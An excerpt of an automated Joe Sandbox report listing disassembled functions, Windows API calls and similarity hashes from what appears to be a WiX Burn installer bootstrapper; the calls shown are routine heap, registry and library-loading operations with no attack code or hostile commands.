                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareStringlstrlen
                                                                                                                                                              • String ID: burn.clean.room
                                                                                                                                                              • API String ID: 1433953587-3055529264
                                                                                                                                                              • Opcode ID: 01b43fd04e268ec04d0e3a8ec88c2a3084ce5305f6a3730acee0af300d64329e
                                                                                                                                                              • Instruction ID: e28d10cdc1389586d6c6ef3849177ebb0480fe9c5e153eff2a48caf72942a3d2
                                                                                                                                                              • Opcode Fuzzy Hash: 01b43fd04e268ec04d0e3a8ec88c2a3084ce5305f6a3730acee0af300d64329e
                                                                                                                                                              • Instruction Fuzzy Hash: 2A014F769105286EC7249BE8AD84A73B7BCEB657A0B104217F505D2690D371AC42CEA1
                                                                                                                                                              Function 00A03838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00A03877
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A03881
                                                                                                                                                              • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 00A038EA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1230559179-0
                                                                                                                                                              • Opcode ID: 3045cc7eafa56b6f5d9199330aee62e8c7c31992fc40dc1edba196cad4ccc368
                                                                                                                                                              • Instruction ID: 31e728a49dca84290f1f799c3a55a031097054555c76835ed5c34ae3a8ea82af
                                                                                                                                                              • Opcode Fuzzy Hash: 3045cc7eafa56b6f5d9199330aee62e8c7c31992fc40dc1edba196cad4ccc368
                                                                                                                                                              • Instruction Fuzzy Hash: FC21C4B7D0123D6BDB20DBA9AC49F9A776C9B44750F1105A1BD14E7281DA70DE448AA0
                                                                                                                                                              Function 00A03A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00A03BB6,00000000,?,00A01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00A013B8), ref: 00A03A20
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,00A03BB6,00000000,?,00A01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00A013B8,?,00000100), ref: 00A03A27
                                                                                                                                                              • GetLastError.KERNEL32(?,00A03BB6,00000000,?,00A01474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,00A013B8,?,00000100,?), ref: 00A03A31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 406640338-0
                                                                                                                                                              • Opcode ID: 60171194ff8ab1e282ff8b0a57eb0fb758ebf93149c55fec6151659e68729291
                                                                                                                                                              • Instruction ID: 3b1a4a5561c60b228efa0fd1293b2c474ebe07539407104927aa970cf197a377
                                                                                                                                                              • Opcode Fuzzy Hash: 60171194ff8ab1e282ff8b0a57eb0fb758ebf93149c55fec6151659e68729291
                                                                                                                                                              • Instruction Fuzzy Hash: 78D0C23BA0013967872097EA6C0C95B7E5CEF82BE27010120FE44D6220D723CC0082F0
                                                                                                                                                              Function 00A0F755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00A40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A6AAA0,00000000,?,00A457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00A40F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00A17D59,?,?,?), ref: 00A0F7B9
                                                                                                                                                                • Part of subcall function 00A41026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00A0F78E,00000000,Installed,00000000,?), ref: 00A4104B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID: Installed
                                                                                                                                                              • API String ID: 3677997916-3662710971
                                                                                                                                                              • Opcode ID: d11277d08bec694d5d5ad8112c8728e04045a4a6b01124f20d0e451724235d6d
                                                                                                                                                              • Instruction ID: 1c6f99ffc323a1d5d386da0499c5c08ff77146311e740945d0e63b26f80cacdd
                                                                                                                                                              • Opcode Fuzzy Hash: d11277d08bec694d5d5ad8112c8728e04045a4a6b01124f20d0e451724235d6d
                                                                                                                                                              • Instruction Fuzzy Hash: 7A018F3682011CFFCB21DBA4D946FDEBBB8EF44711F1141A5E800A7150D3769E409791
                                                                                                                                                              Function 00A40F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A6AAA0,00000000,?,00A457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00A40F80
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID: regutil.cpp
                                                                                                                                                              • API String ID: 71445658-955085611
                                                                                                                                                              • Opcode ID: 9ccedc3c50d2c28f6d658eaa9dc930da3f731d7322eaf9db02bb86408d5c4a4f
                                                                                                                                                              • Instruction ID: ef890708fc2ba6b951223b35b899290eab80cd611b31d91894086679ce9f8c82
                                                                                                                                                              • Opcode Fuzzy Hash: 9ccedc3c50d2c28f6d658eaa9dc930da3f731d7322eaf9db02bb86408d5c4a4f
                                                                                                                                                              • Instruction Fuzzy Hash: 50F0463B601132B68B3006968C05F6BBA69EBC07B0B158131BF46AA250E2718C04B6F0
                                                                                                                                                              Function 00A3F4AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F491
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID: PA9n
                                                                                                                                                              • API String ID: 1269201914-1067447980
                                                                                                                                                              • Opcode ID: 3ea773ac4ae01baf81edc269e471978a54bfc24b1071e9b07ab0b7dd657cbbf3
                                                                                                                                                              • Instruction ID: c385a17aa51c16802c1423ffdd88a9787f0d89be8090657bfeede12be1532a09
                                                                                                                                                              • Opcode Fuzzy Hash: 3ea773ac4ae01baf81edc269e471978a54bfc24b1071e9b07ab0b7dd657cbbf3
                                                                                                                                                              • Instruction Fuzzy Hash: 34B012B62795017D324891241D12C37023CC1D5F21730876EF010C1091E8514C440073
                                                                                                                                                              Function 00A3F49A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F491
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID: PA9n
                                                                                                                                                              • API String ID: 1269201914-1067447980
                                                                                                                                                              • Opcode ID: 9c88191a49c38b611460cf64dc19a948dbae2f3e4d65aabfe56bd45e16506a56
                                                                                                                                                              • Instruction ID: d34e00cf14bfaaddd3479299528b6066714f14b5491ab3c67def4f00f11c1eb4
                                                                                                                                                              • Opcode Fuzzy Hash: 9c88191a49c38b611460cf64dc19a948dbae2f3e4d65aabfe56bd45e16506a56
                                                                                                                                                              • Instruction Fuzzy Hash: F1B012B62794017E324491241E13C37023CC1D5F21730466EF010C1091E8464C050433
                                                                                                                                                              Function 00A3F479 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F491
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID: PA9n
                                                                                                                                                              • API String ID: 1269201914-1067447980
                                                                                                                                                              • Opcode ID: 5c0e68d876b4e81ed0196a80c7def3ca3538a2dd249a4f2823ec2d310854ca02
                                                                                                                                                              • Instruction ID: d559cf3922daccb0dc67f75571d9568a6d1aa4c9edcfec12aa5915718d6ebf35
                                                                                                                                                              • Opcode Fuzzy Hash: 5c0e68d876b4e81ed0196a80c7def3ca3538a2dd249a4f2823ec2d310854ca02
                                                                                                                                                              • Instruction Fuzzy Hash: 57B012BA2794017D320451201D12C37023CC1D1F21730C76EF410D0091A8415C080073
                                                                                                                                                              Function 00A03AF0 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,00A0226D,?,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000), ref: 00A03B04
                                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,00A0226D,?,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03B0B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                              • Opcode ID: 725a4616cdcb8b096801468121ef0091f6b27a7d3c86dff567e317e3ab2a8ff4
                                                                                                                                                              • Instruction ID: 0b1a1fe15995cd9f4ced5d0d0527ffd8677f4e7882bc3ab5e75eb2ec96cbe27e
                                                                                                                                                              • Opcode Fuzzy Hash: 725a4616cdcb8b096801468121ef0091f6b27a7d3c86dff567e317e3ab2a8ff4
                                                                                                                                                              • Instruction Fuzzy Hash: D3D0C93616420DAB8F009FECDC0DDAA3BACEB996027048505B915C2120C73AE4209A60
                                                                                                                                                              Function 00A0394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03960
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03967
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                              • Opcode ID: 0d1e4c0425400f1185a384d43ea8377c862f9d7038d47612f3443d562e28b650
                                                                                                                                                              • Instruction ID: c377fd430958cc59d891207949e4b6d9e94b5d8ac36f95aac08d1bd99cde31cd
                                                                                                                                                              • Opcode Fuzzy Hash: 0d1e4c0425400f1185a384d43ea8377c862f9d7038d47612f3443d562e28b650
                                                                                                                                                              • Instruction Fuzzy Hash: CBC0123A1A420CA78B009FF8DC0DC56379CB7556027048500B505C2110C739E0108770
                                                                                                                                                              Function 00A435C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00A435F8
                                                                                                                                                                • Part of subcall function 00A4304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00A43609,00000000,?,00000000), ref: 00A43069
                                                                                                                                                                • Part of subcall function 00A4304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A2C025,?,00A05405,?,00000000,?), ref: 00A43075
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 52713655-0
                                                                                                                                                              • Opcode ID: ef89d3a2fa8649eed731d9c6641f2924ae94ca1f9d8a815c1cb50def6b634f7d
                                                                                                                                                              • Instruction ID: a88b6a78b9153cf72c25eafd3e6b4a4484899806e78e66943823fd280bd551f9
                                                                                                                                                              • Opcode Fuzzy Hash: ef89d3a2fa8649eed731d9c6641f2924ae94ca1f9d8a815c1cb50def6b634f7d
                                                                                                                                                              • Instruction Fuzzy Hash: D7312F76E01229ABCB11DFA9C884ADFF7F4EF48710F02456AED15BB311D6759D008BA4
                                                                                                                                                              Function 00A45870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(80070490,00000000,80070490,00A6AAA0,00000000,80070490,?,?,00A18B19,WiX\Burn,PackageCache,00000000,00A6AAA0,00000000,00000000,80070490), ref: 00A458CA
                                                                                                                                                                • Part of subcall function 00A410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A4112B
                                                                                                                                                                • Part of subcall function 00A410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00A41163
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1979452859-0
                                                                                                                                                              • Opcode ID: 946cd6c5a5883d20d973c3292e7f816cd501bf16ae01876eeab6e58fb584c404
                                                                                                                                                              • Instruction ID: c3856d8e7a4139cee9cead807553dd40770f73c8d713636c01ed321fc877a2d4
                                                                                                                                                              • Opcode Fuzzy Hash: 946cd6c5a5883d20d973c3292e7f816cd501bf16ae01876eeab6e58fb584c404
                                                                                                                                                              • Instruction Fuzzy Hash: 2E11913EC00629EF8B22AFB4D9415AEBB68EB84320B154139FD0167113CB314E50E6D1
                                                                                                                                                              Function 00A3521A Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A31F87,?,0000015D,?,?,?,?,00A333E0,000000FF,00000000,?,?), ref: 00A3524C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: e3e06d01579a7b77ce73ac95746ba6142b3c36d9fc901c17dcd15b8563b23949
                                                                                                                                                              • Instruction ID: 5f81f516b5438ccd80abcea69654d5b8e279d9b8b18f1a6bec31069f30a47b8f
                                                                                                                                                              • Opcode Fuzzy Hash: e3e06d01579a7b77ce73ac95746ba6142b3c36d9fc901c17dcd15b8563b23949
                                                                                                                                                              • Instruction Fuzzy Hash: A5E02B31D00A645EDB212BFD9C06BDBB7589FA23A0F250210FC1192090CBA0DC4141F1
                                                                                                                                                              Function 00A034B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00A18BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00A034D5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FolderPath
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1514166925-0
                                                                                                                                                              • Opcode ID: 8c3b068cc64872457b192543bf8ab0648387f2f1ac57be945eb9d45f61353f60
                                                                                                                                                              • Instruction ID: 19d7a299d273ad45a3c603546a6d3acb9191117e9914f42e5587011c9d02e7c0
                                                                                                                                                              • Opcode Fuzzy Hash: 8c3b068cc64872457b192543bf8ab0648387f2f1ac57be945eb9d45f61353f60
                                                                                                                                                              • Instruction Fuzzy Hash: B8E0127620122C7BEA026FA5AC09DEB7B5C9F067557008451BE40DA050D763E55087B4
                                                                                                                                                              Function 00A49684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A4966B
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
